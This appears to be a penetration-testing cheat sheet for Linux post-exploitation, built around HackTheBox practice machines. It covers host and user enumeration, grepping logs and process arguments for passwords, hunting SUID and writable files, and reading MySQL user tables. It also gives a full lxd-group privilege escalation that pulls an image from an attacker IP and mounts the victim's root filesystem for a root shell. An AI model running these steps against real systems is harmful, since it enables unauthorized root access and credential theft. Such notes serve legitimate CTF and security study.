Post Exploit Checks
General Enumeration
Know if the environment is a real host
ls -la / # check if the root dir has .[dot] files we can know if its a docker env
hostname
Know the permissions of the user
sudo -l
id
Know the users
cat /etc/passwd
Check for
.htaccess
file/etc/apache2/sites-enabled/*
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
Application Specific Configs : wp-config, settings.php etc..,
Groups Exploitation
4(adm)
The adm group members can view the log files
cd /var/log
grep -EnRi password .
Machine:
Academy - HTB : https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620
Doctor - HTB : https://youtube.com/watch?v=JcOR9krOPFY&t=1780
116(lxd)
The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment
# attacker machine
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
# victim machine
lxd init # yes to all
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine
Files Enumeration
Find suid binaries
find / -perm /4000 -ls 2>/dev/null
Find Writeable files
find / -type f -writable 2>/dev/null | grep -v proc
Find files owned by the user (group specific)
# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
Locations to check
ls /opt
ls /usr/local/bin
ls ~/.local/bin
Background Jobs Enumeration
Crontabs
crontab -l
cat /etc/crontab
Enumerate processes with pspy
Network Enumeration
Know the network adapters ( might be communicating internally )
ip a
Open Ports and services
netstat -antp
# look for unusal services running interally or mysql service
Process Enumeration
Enumerate the services that are running
ps aux
Get more information about the process (like the passed arguments etc.., it might contain passwords )
# know the process id from ps aux
cat /proc/<processid>/cmd
Web Directories
Check the web directories for passwords
/var/www/*
MYSQL
If MYSQL is running as root in the machine check for priv esc via library
The
\G
option in the sql query of the mysql prints the information in a prettier format
# Connecting to mysql
mysql -u root -p
# password prompt
mysql> select * from wp_users \G # instead of "select * from wp_users;"
Last updated
Was this helpful?